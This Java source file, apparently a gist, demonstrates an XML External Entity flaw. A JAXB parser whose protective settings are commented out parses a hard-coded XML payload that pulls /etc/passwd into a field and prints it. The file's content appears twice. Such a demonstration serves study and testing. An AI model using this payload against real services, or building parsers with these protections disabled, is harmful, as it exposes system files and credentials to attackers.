lillesand/Fjalleball.java

## Fjalleball.java
package no.posten.dpost.signering;

import org.springframework.xml.transform.StringSource;

import javax.xml.bind.JAXBContext;
import javax.xml.bind.Marshaller;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;

public class Fjalleball {


        public static void main(String[] args) throws Exception {
            JAXBContext jc = JAXBContext.newInstance(Customer.class);

            XMLInputFactory xif = XMLInputFactory.newFactory();
            //xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
            //xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);

            XMLStreamReader xsr = xif.createXMLStreamReader(new StringSource("<?xml version=\"1.0\"?>\n" +
                    "<!DOCTYPE customer [<!ENTITY name SYSTEM \"/etc/passwd\">]>\n" +
                    "<customer>\n" +
                    "  <name>&name;</name>\n" +
                    "</customer>"));

            Unmarshaller unmarshaller = jc.createUnmarshaller();
            Customer customer = (Customer) unmarshaller.unmarshal(xsr);

            Marshaller marshaller = jc.createMarshaller();
            marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
            marshaller.marshal(customer, System.out);
        }

    @XmlRootElement
    public static class Customer {

        private String name;

        public String getName() {
            return name;
        }

        public void setName(String name) {
            this.name = name;
        }

    }

}
	package no.posten.dpost.signering;

	import org.springframework.xml.transform.StringSource;

	import javax.xml.bind.JAXBContext;
	import javax.xml.bind.Marshaller;
	import javax.xml.bind.Unmarshaller;
	import javax.xml.bind.annotation.XmlRootElement;
	import javax.xml.stream.XMLInputFactory;
	import javax.xml.stream.XMLStreamReader;

	public class Fjalleball {


	public static void main(String[] args) throws Exception {
	JAXBContext jc = JAXBContext.newInstance(Customer.class);

	XMLInputFactory xif = XMLInputFactory.newFactory();
	//xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
	//xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);

	XMLStreamReader xsr = xif.createXMLStreamReader(new StringSource("<?xml version=\"1.0\"?>\n" +
	"<!DOCTYPE customer [<!ENTITY name SYSTEM \"/etc/passwd\">]>\n" +
	"<customer>\n" +
	" <name>&name;</name>\n" +
	"</customer>"));

	Unmarshaller unmarshaller = jc.createUnmarshaller();
	Customer customer = (Customer) unmarshaller.unmarshal(xsr);

	Marshaller marshaller = jc.createMarshaller();
	marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
	marshaller.marshal(customer, System.out);
	}

	@XmlRootElement
	public static class Customer {

	private String name;

	public String getName() {
	return name;
	}

	public void setName(String name) {
	this.name = name;
	}

	}

	}